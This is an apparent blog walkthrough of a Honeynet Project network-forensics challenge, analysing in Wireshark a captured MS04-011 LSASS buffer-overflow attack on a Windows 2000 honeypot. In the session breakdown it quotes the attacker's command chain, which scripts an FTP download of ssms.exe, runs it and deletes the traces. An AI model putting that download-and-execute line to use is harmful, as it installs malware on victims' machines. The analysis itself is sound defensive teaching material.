Overview – Wireshark Workflow
This is an example of my workflow for examining malicious network traffic. The traffic I’ve chosen is traffic from The Honeynet Project and is one of their challenges captures. For small pcaps I like to use Wireshark just because its easier to use. Sometimes I’ll pull apart large a pcap, grab the TCP stream I want and look at it in Wireshark.
What you use to look at traffic largely depends on what’s going on. You could run it through snort, bro or SiLK if you wanted and if this pcap was large, that’s exactly what I would do. This pcap has 348 packets, The Honeynet Project has already carved it out of a much larger pcap for us.
First, my setup, I’m doing this in a Kali 2.0 VM (Virtual Machine) with my network card disabled. I do this because in the event I’m analyzing something or carve a binary out of the traffic I want to make sure my host operating system does not get infected.
The Challenge:
A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:
- Which systems (i.e. IP addresses) are involved? (2pts)
- I just use Wireshark -> Statistics -> Endpoints -> IP. This IP address is located in Philadelphia, unknown of it its a true source IP or not at this point.
- I just use Wireshark -> Statistics -> Endpoints -> IP. This IP address is located in Philadelphia, unknown of it its a true source IP or not at this point.
- What can you find out about the attacking host (e.g., where is it located)? (2pts)
- Simple, I just use https://db-ip.com/ to locate the IP address.
- Simple, I just use https://db-ip.com/ to locate the IP address.
- How many TCP sessions are contained in the dump file? (2pts)
- I like to use Wireshark -> Statistics -> Conversations -> TCP. We have 5 TCP sessions that were established between the attack and victim, keep in mind Wireshark TCP streams start at 0 so our streams go from 0 – 4 for a total of 5.
- I like to use Wireshark -> Statistics -> Conversations -> TCP. We have 5 TCP sessions that were established between the attack and victim, keep in mind Wireshark TCP streams start at 0 so our streams go from 0 – 4 for a total of 5.
- How long did it take to perform the attack? (2pts)
- Wireshark -> Statistics -> Summary. Total time 16 seconds.
- Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
- Using wireshark I can see that Samba (SMB) is being used. SMB sends along some OS information when its setting up so if you look at packet 16 in the SMB header you can see Windows 2000. On packet 33 you can see a big list of 1’s and Wireshark reporting a “long frame”. If you follow the TCP streams you’ll also note that this is the end of tcp steam 1. If we take a look at what’s going on we see that the attacker is sending DsRoleUpgradeDownlevelServer and following it with a buffer overflow. With some quick searching I found that this is exploit MS04-011 which exploits a vulnerable LSASS function aka. The Sasser worm.
- Using wireshark I can see that Samba (SMB) is being used. SMB sends along some OS information when its setting up so if you look at packet 16 in the SMB header you can see Windows 2000. On packet 33 you can see a big list of 1’s and Wireshark reporting a “long frame”. If you follow the TCP streams you’ll also note that this is the end of tcp steam 1. If we take a look at what’s going on we see that the attacker is sending DsRoleUpgradeDownlevelServer and following it with a buffer overflow. With some quick searching I found that this is exploit MS04-011 which exploits a vulnerable LSASS function aka. The Sasser worm.
- Can you sketch an overview of the general actions performed by the attacker? (6pts)
- TCP Connection 1 – The attacker initiates and closes a TCP connection with the victim. Most likely recon for open 445 port.
- TCP Connection 2 – SMB Connection is established, attacker exploits LSASS with a buffer overflow
- TCP Connection 3 – The following code is ran “echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe (&’s indicate line breaks)
- TCP Connection 4 – A user logs in via a FTP backdoor and requests a binary to be downloaded
- TCP Connection 5 – Binary is downloaded to victim machine
- What specific vulnerability was attacked? (2pts)
- MS04-011 LSASS DsRoleUpgradeDownlevelServer function
- Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
- In an IP header different operating systems will provide different time to live values. I think its a honeypot because at quick glance the TTL values don’t match a Windows machine, this machine said it was Windows 2000 in the SMB header, but uses a Linux TTL value of 64.
- Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
- Yes. By carving the binary out of the pcap and obtaining a sha1 hash of the file Virtual Total Reports it as being titled smss.exe with a variety of back door names.
- Do you think this is a manual or an automated attack? Why? (2pts)
- Automated, this happened in 16 seconds. I highly doubt an attacker would have been able to manually scan, exploit, enter 7 commands, download and execute a binary in that time.
Summary
To wrap it all up this was a buffer overflow of a function that was accessible via SMB on port 445. The service was exploited via buffer overflow and then arbitrary commands were allowed be executed on behalf of the attacker. I realize that this wasn’t a walkthrough or the most technical breakdown but hopefully it gives you guys some insight as to how I look at pcaps and how you could reconstruct an attack when looking at network traffic captures.
